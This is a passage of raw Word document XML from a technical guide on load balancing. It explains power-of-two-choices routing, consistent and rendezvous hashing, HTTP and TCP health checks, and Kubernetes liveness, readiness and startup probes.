    <w:p w14:paraId="3739137D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>A server processing 5 CPU-intensive ML inference requests may be more loaded than one handling 50 idle WebSocket connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD785B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Least Time (Envoy's algorithm):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Routes to the backend with the lowest (active_requests × p99_latency) value — a proxy for actual load that combines concurrency and processing time. A backend that's handling 5 requests but taking 100ms each is scored the same as one handling 10 requests taking 50ms each. More accurate than pure connection count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EEFBA5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Power of Two Choices (P2C) — Why It's Mathematically Brilliant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B38D8CE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Pick two backends </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uniformly at random</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>, route to the one with fewer active connections (or lower measured load). Ties broken randomly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE25E4E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mathematical magic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D48BFC2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>With purely </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> routing (pick 1): maximum load on any server is O(log N / log log N) with high probability (birthday paradox — some servers are repeatedly chosen).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF1651F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>With </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least connections globally</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (pick all, find minimum): maximum load is O(1) — perfectly even. But requires O(N) work per request and global lock contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C12277" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>With </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P2C</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (pick 2): maximum load is O(log log N) — an exponential improvement over random, and near-optimal like least connections, with only O(1) work per request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153FEA7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>For N=1,000,000 backends: random gives max load of ~20, P2C gives max load of ~4 (log log 1,000,000 ≈ 4.2), global least connections gives max load of 1. P2C gets 80% of the benefit of perfect optimization with 1% of the cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D3B30" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why randomness is crucial:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> If all load balancers look at the same two backends (not random), they might all agree on the same "less loaded" backend and send it all their traffic simultaneously. Independent random selection across all LB instances prevents synchronized stampedes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B47748" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P2C with exponential decay:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Augment P2C by using </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>measured request latency</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> rather than connection count. Each backend tracks an exponentially weighted moving average (EWMA) of response latency. The EWMA decay rate is tuned so that a period of good performance reduces the score smoothly rather than immediately. Backends that were recently slow remain slightly penalized even after recovery — preventing premature traffic restoration to recovered-but-fragile backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50CCA3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent Hashing — Request Routing With Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C76DFF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>When requests from the same client must reach the same backend (session affinity, cache locality), consistent hashing provides deterministic routing that degrades gracefully when backends are added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED38EE0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ring construction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D0CE7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Hash each backend identifier to a position on a ring [0, 2³²).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684D88E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>To handle N backends with V vnodes each: generate V positions per backend using V different hash seeds (e.g., hash("backend1:vnode:0"), hash("backend1:vnode:1"), ...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317482DF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Store all V×N positions in a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sorted array</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (sorted by position on the ring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD8332" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing a request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302EFB5E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Hash the request's routing key (client IP, session ID, user ID) to a position P.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E15B3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binary search</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> the sorted position array to find the first vnode position ≥ P. O(log(V×N)) — fast even for thousands of backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43319E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Route to the physical backend owning that vnode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD36014" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why the sorted array + binary search:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The ring is a conceptual model. Physically, you want O(log N) lookup time, not O(N) linear scan. A sorted array with binary search gives this efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1719A567" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rendezvous hashing (HRW — Highest Random Weight):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> An alternative to ring-based consistent hashing. For each request with key K and N backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEB147E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Compute score(backend_i) = hash(K, backend_i) for every backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E08D4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Route to the backend with the highest score.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54258BCD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Every backend gets a different score for every key (different hash inputs). The backend with the highest score wins. When a backend is removed, only keys where that backend had the highest score are remapped — all other keys' relative ordering is unchanged. No ring construction needed, no vnode complexity. </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trade-off:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> O(N) computation per request (hash N backends for each request). For small N (≤100), this is fine. For large N, ring hashing with binary search is faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7108B2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bounded load consistent hashing (Google's approach):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Pure consistent hashing causes uneven load when request distributions are skewed (hot keys). Google's bounded load algorithm adds a constraint: route to the consistent-hash-selected backend </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only if its load is below a threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve"> (e.g., 1.25× average load). If above threshold, route to the next </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>backend clockwise. This bounds the maximum load any backend receives while preserving locality for most requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E676A9B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="4122554B">
          <v:rect id="_x0000_i2535" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1071A343" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Health Checking — The Full Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72910AFE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health Check Types and What They Actually Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415FA151" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP health check:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Attempt connect() to backend's IP and port. Three outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC81C3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>SYN-ACK received: port is open, OS is running, process is listening. Returns healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CAC771" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>RST received: port is closed, process is not listening. Returns unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C521D55" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Timeout: host is unreachable, network partition, or process is completely frozen. Returns unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153C1335" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>What it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>doesn't</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> test: whether the application is actually functioning, whether the database it depends on is reachable, whether its thread pool is exhausted (it can accept the TCP connection but immediately put it in the accept queue without processing it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB99D1D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP health check:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The LB sends GET /health HTTP/1.1. The application processes the request and responds. The LB checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD389A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>HTTP status code (200 = healthy, anything else = unhealthy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57014855" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Optional: response body (JSON {"status": "ok"} or similar).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740BD4B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Optional: response time (if response takes &gt;X ms, consider it unhealthy even if it returned 200).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AACCF9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The /health endpoint should be </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — it's called frequently (every 5–10 seconds per LB instance). But it should be </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meaningful</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — it should fail if the application is genuinely unable to serve requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886476B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Composite health checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EC158" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC0EE7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>/health returns 200 if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4AE20" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  - Database connection pool has available connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28FC48" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  - Redis connection is responsive (ping &lt; 10ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12633D56" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  - Internal queue depth &lt; 10,000 (not backed up)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434C45E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - JVM heap utilization &lt; 90%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DFF7F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="6C1F9190" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>/health returns 503 if any of the above fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122026D8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The risk of deep health checks: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cascading false positives</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. If your health check pings an upstream service and that service is temporarily slow, your backend gets marked unhealthy even though it could serve requests (possibly from cache, or for endpoints that don't need that upstream). Best practice: distinguish between </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>critical dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (database — must be reachable for any request) and </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-critical dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (recommendation service — requests can succeed without it). Only fail the health check for critical dependency failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767EE4BD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Liveness vs Readiness — The Kubernetes Model in Depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A104E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Liveness probe failure → restart the container.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The container is broken in a way that only a restart can fix — deadlocked threads, corrupted internal state, memory leak that's exhausted the heap. The probe tests: "Is this process alive and functional?" If not, kill it and start fresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF08508" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Readiness probe failure → remove from load balancer pool, do not restart.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The container is alive but temporarily not ready — still initializing (loading a large model, warming caches), temporarily overloaded, or waiting for a dependency to recover. The probe tests: "Should this process receive traffic right now?" If not, take it out of rotation but let it recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C7820" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical distinction:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> A container can fail its readiness probe and recover without a restart (dependency recovers, initialization completes, overload subsides). If you used a liveness probe for this check, the container would be restarted — potentially making the situation worse (restarted container also needs time to initialize, potentially cascade-restarting all containers simultaneously).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16090C9D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Startup probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> For slow-starting applications (Java services, ML inference servers loading large models). The startup probe runs </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>instead of</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> the liveness probe until it succeeds. Once the startup probe succeeds, the liveness probe takes over. This prevents the liveness probe from killing a slow-starting container that just needs more time to initialize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435A438" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Probe failure cascades:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> If a bug causes all pods to fail their readiness probes simultaneously, all are removed from the load balancer pool simultaneously — </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
